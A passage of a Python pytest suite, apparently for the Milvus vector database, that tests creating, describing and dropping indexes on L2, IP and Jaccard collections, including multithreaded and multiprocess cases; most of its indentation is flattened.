threads_num = 8
loop_num = 8
threads = []
collection = []
j = 0
while j < (threads_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
        def create_index(connect, idx):
            i = 0
            while i < loop_num:
                # assert connect.has_collection(collection[idx*threads_num+i])
                status, ids = connect.add_vectors(collection[idx*threads_num+i], vectors)
                status = connect.create_index(collection[idx*threads_num+i], IndexType.IVFLAT, {"nlist": NLIST})
                assert status.OK()
                query_vec = [vectors[0]]
                top_k = 1
                search_param = {"nprobe": nprobe}
                status, result = connect.search_vectors(collection[idx*threads_num+i], top_k, query_vec, params=search_param)
                assert len(result) == 1
                assert len(result[0]) == top_k
                assert result[0][0].distance == 0.0
                i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
            t = threading.Thread(target=create_index, args=(m, i))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_a_multithreads(self, connect, collection, args):
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
def count(connect):
status, count = connect.count_collection(collection)
assert status.OK()
assert count == nb
threads_num = 8
threads = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
if(i % 2 == 0):
p = threading.Thread(target=build, args=(m,))
else:
p = threading.Thread(target=count, args=(m,))
threads.append(p)
p.start()
time.sleep(0.2)
for p in threads:
p.join()
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
        def create_index(connect, idx):
            i = 0
            while i < loop_num:
                # assert connect.has_collection(collection[idx*process_num+i])
                status, ids = connect.add_vectors(collection[idx*process_num+i], vectors)
                status = connect.create_index(collection[idx*process_num+i], IndexType.IVFLAT, {"nlist": NLIST})
                assert status.OK()
                query_vec = [vectors[0]]
                top_k = 1
                search_param = {"nprobe": nprobe}
                status, result = connect.search_vectors(collection[idx*process_num+i], top_k, query_vec, params=search_param)
                assert len(result) == 1
                assert len(result[0]) == top_k
                assert result[0][0].distance == 0.0
                i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
            p = Process(target=create_index, args=(m, i))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_collection_not_existed(self, connect):
'''
        target: test create index interface when the collection does not exist
        method: create index using a collection name that was never created
expected: return code not equals to 0, create index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, index_type, index_param)
assert not status.OK()
def test_create_index_collection_None(self, connect):
'''
target: test create index interface when collection name is None
        method: create index with collection_name: None
expected: return code not equals to 0, create index failed
'''
collection_name = None
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = connect.create_index(collection_name, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: check if index can be created repeatedly, with the same create_index params
        method: create index again after an index has been built
expected: return code success, and search ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
assert result._params["nlist"] == nlist
assert result._collection_name == collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, collection, get_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and correct index structure
'''
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
if status.OK():
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of L2
method: create collections and add vectors in it, create index, call describe index
        expected: return code 0, and correct index structure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, collection):
'''
target: test describe index without connection
        method: describe index while disconnected
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(collection)
def test_describe_index_collection_not_existed(self, connect):
'''
        target: test describe index interface when the collection does not exist
        method: describe index using a collection name that was never created
expected: return code not equals to 0, describe index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status, result = connect.describe_index(collection_name)
assert not status.OK()
def test_describe_index_collection_None(self, connect):
'''
target: test describe index interface when collection name is None
        method: describe index with collection_name: None
expected: return code not equals to 0, describe index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.describe_index(collection_name)
def test_describe_index_not_create(self, connect, collection):
'''
target: test describe index interface when index not created
        method: create collection and add vectors in it, then describe index without creating one
        expected: return code 0, and the default index info is returned
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
        target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, collection):
'''
target: test drop index without connection
        method: drop index while disconnected
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(collection)
def test_drop_index_collection_not_existed(self, connect):
'''
        target: test drop index interface when the collection does not exist
        method: drop index using a collection name that was never created
expected: return code not equals to 0, drop index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status = connect.drop_index(collection_name)
assert not status.OK()
def test_drop_index_collection_None(self, connect):
'''
target: test drop index interface when collection name is None
        method: drop index with collection_name: None
expected: return code not equals to 0, drop index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.drop_index(collection_name)
def test_drop_index_collection_not_create(self, connect, collection):
'''
target: test drop index interface when index not created
        method: create collection and add vectors in it, then drop index without creating one
        expected: return code 0, drop index succeeds as a no-op
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(collection)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
        target: test create / drop index repeatedly, using the same index params
        method: create index then drop index, repeatedly in a loop
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, collection):
'''
        target: test create / drop index repeatedly, using different index params
        method: create index then drop index repeatedly, each time using different index_params to create the index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
class TestIndexIP:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_collection(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index on collection
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, ip_collection):
'''
target: test create index without connection
        method: create index on a collection while disconnected
expected: raise exception
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(ip_collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ip_collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ip_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, ip_collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(ip_collection, vectors)
def build(connect):
status = connect.create_index(ip_collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim}
connect.create_collection(param)
j = j + 1
        def create_index(connect, idx):
            i = 0
            while i < loop_num:
                # assert connect.has_collection(collection[idx*process_num+i])
                status, ids = connect.add_vectors(collection[idx*process_num+i], vectors)
                status = connect.create_index(collection[idx*process_num+i], IndexType.IVFLAT, {"nlist": NLIST})
                assert status.OK()
                query_vec = [vectors[0]]
                top_k = 1
                search_param = {"nprobe": nprobe}
                status, result = connect.search_vectors(collection[idx*process_num+i], top_k, query_vec, params=search_param)
                assert len(result) == 1
                assert len(result[0]) == top_k
                assert result[0][0].distance == 0.0
                i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
            p = Process(target=create_index, args=(m, i))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_no_vectors(self, connect, ip_collection):
'''
target: test create index interface when there is no vectors in collection
method: create collection and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the same create_index params
        method: create index again after an index has been built
expected: return code success, and search ok
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the different create_index params
        method: create another index with different index_params after an index has been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(ip_collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params["nlist"] == nlist
assert result._collection_name == ip_collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: return code 0, and correct index structure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
# status, ids = connect.add_vectors(ip_collection, vectors[:5000])
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
status, mode = connect._cmd("mode")
if str(mode) == "GPU" and index_type == IndexType.IVF_PQ:
assert result._index_type == IndexType.FLAT
assert result._params["nlist"] == NLIST
else:
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: return code 0, and correct index structure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_index_partition_A(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call describe index
        expected: return code 0, and correct index structure
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=new_tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of IP
method: create collections and add vectors in it, create index, call describe index
        expected: return code 0, and correct index structure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, ip_collection):
'''
target: test describe index without connection
        method: describe index while disconnected
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(ip_collection)
def test_describe_index_not_create(self, connect, ip_collection):
'''
target: test describe index interface when index not created
        method: create collection and add vectors in it, then describe index without creating one
        expected: return code 0, and the default index info is returned
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition_C(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call drop partition index
expected: return code 0, and default index param
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
        target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(ip_collection, vectors)
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, ip_collection):
'''
target: test drop index without connection
        method: drop index without an active connection
expected: raise exception
'''
nlist = NLIST
index_type = IndexType.IVFLAT
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(ip_collection, index_type, index_param)
def test_drop_index_collection_not_create(self, connect, ip_collection):
'''
target: test drop index interface when index not created
        method: create collection and add vectors in it, but do not create an index
        expected: return code 0, dropping a non-existent index is a no-op
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(ip_collection)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
        target: test create / drop index repeatedly, using the same index params
        method: create index then drop index, twice
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, ip_collection):
'''
        target: test create / drop index repeatedly, using different index params
        method: create index then drop index, twice, each time using different index_params to create the index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params == indexs[i]["index_param"]
assert result._collection_name == ip_collection
assert result._index_type == indexs[i]["index_type"]
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
class TestIndexJAC:
tmp, vectors = gen_binary_vectors(nb, dim)
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
        if str(connect._cmd("mode")[1]) == "CPU":
            if request.param["index_type"] == IndexType.IVF_SQ8H:
                pytest.skip("sq8h not supported in CPU mode")
        if str(connect._cmd("mode")[1]) == "GPU":
            if request.param["index_type"] == IndexType.IVF_PQ:
                pytest.skip("ivfpq not supported in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
        if str(connect._cmd("mode")[1]) == "CPU":
            if request.param["index_type"] == IndexType.IVF_SQ8H:
                pytest.skip("sq8h not supported in CPU mode")
        if str(connect._cmd("mode")[1]) == "GPU":
            if request.param["index_type"] == IndexType.IVF_PQ:
                pytest.skip("ivfpq not supported in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, jac_collection, get_jaccard_index):
'''
target: test create index interface
